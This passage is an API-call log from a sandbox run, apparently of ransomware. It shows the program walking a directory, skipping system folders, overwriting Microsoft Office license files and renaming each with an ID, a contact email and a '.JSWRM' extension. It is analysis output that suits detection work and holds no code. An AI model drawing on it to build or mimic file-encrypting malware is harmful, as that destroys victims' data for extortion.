lpMultiByteStr="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0104.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0104.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0104.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0104.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0104.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0104.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0104.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0104.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0104.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.642] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11219) returned 1 [0104.642] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bd0) returned 0x24c1d0 [0104.642] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bd0, lpOverlapped=0x0) returned 1 [0104.648] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.649] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bd0, lpOverlapped=0x0) returned 1 [0104.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.650] CloseHandle (hObject=0x45c) returned 1 [0104.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0104.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0104.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0104.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0104.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0104.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0104.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.652] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0104.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0104.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0104.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.660] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5800a85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5800a85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe58e5931, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5aa7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", cAlternateFileName="O3BF9B~1.XRM")) returned 1 [0104.660] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0104.660] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0104.661] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0104.661] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0104.662] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.663] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.663] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.664] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.664] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.664] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0104.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0104.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0104.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0104.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0104.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0104.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0104.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0104.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0104.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0104.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0104.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.668] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23207) returned 1 [0104.672] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5aa0) returned 0x24c1d0 [0104.672] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5aa0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5aa0, lpOverlapped=0x0) returned 1 [0104.675] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.675] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5aa0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5aa0, lpOverlapped=0x0) returned 1 [0104.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.675] CloseHandle (hObject=0x45c) returned 1 [0104.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0104.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0104.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0104.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0104.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0104.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0104.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.676] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0104.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0104.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0104.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.677] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5768162, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5768162, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe59a44ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d9a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="O365HO~3.XRM")) returned 1 [0104.677] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.678] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.678] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.678] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.678] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.678] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.678] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.678] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.678] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.678] lstrcmpiW (lpString1="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0104.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0104.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0104.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0104.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0104.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0104.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22d0a0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0104.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0104.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0104.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0104.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e0d0 [0104.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.679] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11674) returned 1 [0104.679] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0104.679] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0104.687] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.687] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0104.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.694] CloseHandle (hObject=0x45c) returned 1 [0104.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0104.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0104.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0104.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0104.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0104.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0104.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.695] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0104.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0104.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e0d0 | out: hHeap=0x1e0000) returned 1 [0104.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.696] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe568339c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe568339c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5768162, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a1c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Grace-ppd.xrm-ms", cAlternateFileName="O365HO~1.XRM")) returned 1 [0104.696] lstrcmpiW (lpString1="O365HomePremR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0104.696] lstrcmpiW (lpString1="O365HomePremR_Grace-ppd.xrm-ms", lpString2="..") returned 1 